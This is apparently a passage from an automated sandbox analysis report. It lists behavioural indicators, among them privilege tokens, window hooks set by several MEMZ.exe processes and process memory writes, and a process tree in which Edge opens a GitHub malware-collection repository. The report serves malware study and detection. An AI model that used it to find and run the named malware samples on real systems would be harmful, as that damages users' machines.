WMIC.exe Token: SeShutdownPrivilege 1692 WMIC.exe Token: SeDebugPrivilege 1692 WMIC.exe Token: SeSystemEnvironmentPrivilege 1692 WMIC.exe Token: SeRemoteShutdownPrivilege 1692 WMIC.exe Token: SeUndockPrivilege 1692 WMIC.exe Token: SeManageVolumePrivilege 1692 WMIC.exe Token: 33 1692 WMIC.exe Token: 34 1692 WMIC.exe Token: 35 1692 WMIC.exe Token: 36 1692 WMIC.exe Token: SeIncreaseQuotaPrivilege 1692 WMIC.exe Token: SeSecurityPrivilege 1692 WMIC.exe Token: SeTakeOwnershipPrivilege 1692 WMIC.exe Token: SeLoadDriverPrivilege 1692 WMIC.exe Token: SeSystemProfilePrivilege 1692 WMIC.exe Token: SeSystemtimePrivilege 1692 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 556 7zG.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 2036 msedge.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe 5164 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2756 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 5436 MEMZ.exe 5232 MEMZ.exe 5228 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 1556 MEMZ.exe 1564 MEMZ.exe 4060 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 4060 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 1564 MEMZ.exe 1556 MEMZ.exe 1564 MEMZ.exe 5232 MEMZ.exe 4060 MEMZ.exe 5228 MEMZ.exe 1564 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 4060 MEMZ.exe 1556 MEMZ.exe 1556 MEMZ.exe 5232 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 5228 MEMZ.exe 1556 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 5228 MEMZ.exe 1564 MEMZ.exe 4060 MEMZ.exe 1556 MEMZ.exe 5232 MEMZ.exe 4060 MEMZ.exe 5228 MEMZ.exe 1564 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 5228 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 1556 MEMZ.exe 5232 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 5228 MEMZ.exe 5232 MEMZ.exe 1556 MEMZ.exe 4060 MEMZ.exe 1564 MEMZ.exe 5228 MEMZ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2036 wrote to memory of 4164 2036 msedge.exe 86 PID 2036 wrote to memory of 4164 2036 msedge.exe 86 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 1548 2036 msedge.exe 87 PID 2036 wrote to memory of 2992 2036 msedge.exe 88 PID 2036 wrote to memory of 2992 2036 msedge.exe 88 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 PID 2036 wrote to memory of 4592 2036 msedge.exe 89 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Pyran1/MalwareDatabase1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdadb246f8,0x7ffdadb24708,0x7ffdadb247182⤵PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2300 /prefetch:22⤵PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:82⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:82⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:12⤵PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:4444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:1740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5368 /prefetch:82⤵PID:2148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:4072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:12⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:12⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1264 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:12⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:12⤵PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3088 /prefetch:82⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:12⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:82⤵PID:5960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:82⤵PID:2296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:12⤵PID:264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:82⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:82⤵PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:12⤵PID:3284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:12⤵PID:1668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 /prefetch:82⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:12⤵PID:2148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:82⤵PID:4432
-
-
